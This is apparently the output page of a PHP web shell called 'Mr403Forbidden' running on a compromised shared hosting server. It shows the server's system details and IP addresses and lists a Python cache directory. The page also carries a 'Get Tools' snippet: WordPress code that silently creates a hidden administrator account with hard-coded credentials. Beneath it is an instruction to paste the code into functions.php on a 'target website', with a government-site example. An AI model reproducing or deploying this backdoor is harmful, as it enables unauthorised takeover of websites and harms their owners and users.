./Mr403Forbidden

:/lib/python3.8/site-packages/pkg_resources/_vendor/__pycache__/ [ drwxr-xr-x ]

System: Linux ngx341.inmotionhosting.com 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64
Software: Apache
PHP Version: 8.3.19 PHP Os: Linux
Server IP: 192.145.239.41
Your IP: 3.135.248.144
User: babara5 (3680) | Group: babara5 (3683)
Safe Mode: OFF
MYSQL: OFF | PERL: ON | PYTHON: OFF | WGET: ON | CURL: ON | GCC: ON | PKEXEC: OFF
Disable Function:
opcache_get_status

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = 'mr403forbidden@hotmail.com';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
__init__.cpython-38.opt-1...-. file 2022-04-21 12:45 157 B root/root -rw-r--r--
__init__.cpython-38.pyc file 2022-04-21 12:45 157 B root/root -rw-r--r--
appdirs.cpython-38.opt-1....-. file 2022-04-21 12:45 20.03 KB root/root -rw-r--r--
appdirs.cpython-38.pyc file 2022-04-21 12:45 20.03 KB root/root -rw-r--r--
pyparsing.cpython-38.opt-...-. file 2022-04-21 12:45 196.91 KB root/root -rw-r--r--
pyparsing.cpython-38.pyc file 2022-04-21 12:45 196.91 KB root/root -rw-r--r--
six.cpython-38.opt-1.pyc file 2022-04-21 12:45 23.86 KB root/root -rw-r--r--
six.cpython-38.pyc file 2022-04-21 12:45 23.86 KB root/root -rw-r--r--

© ./Mr403Forbidden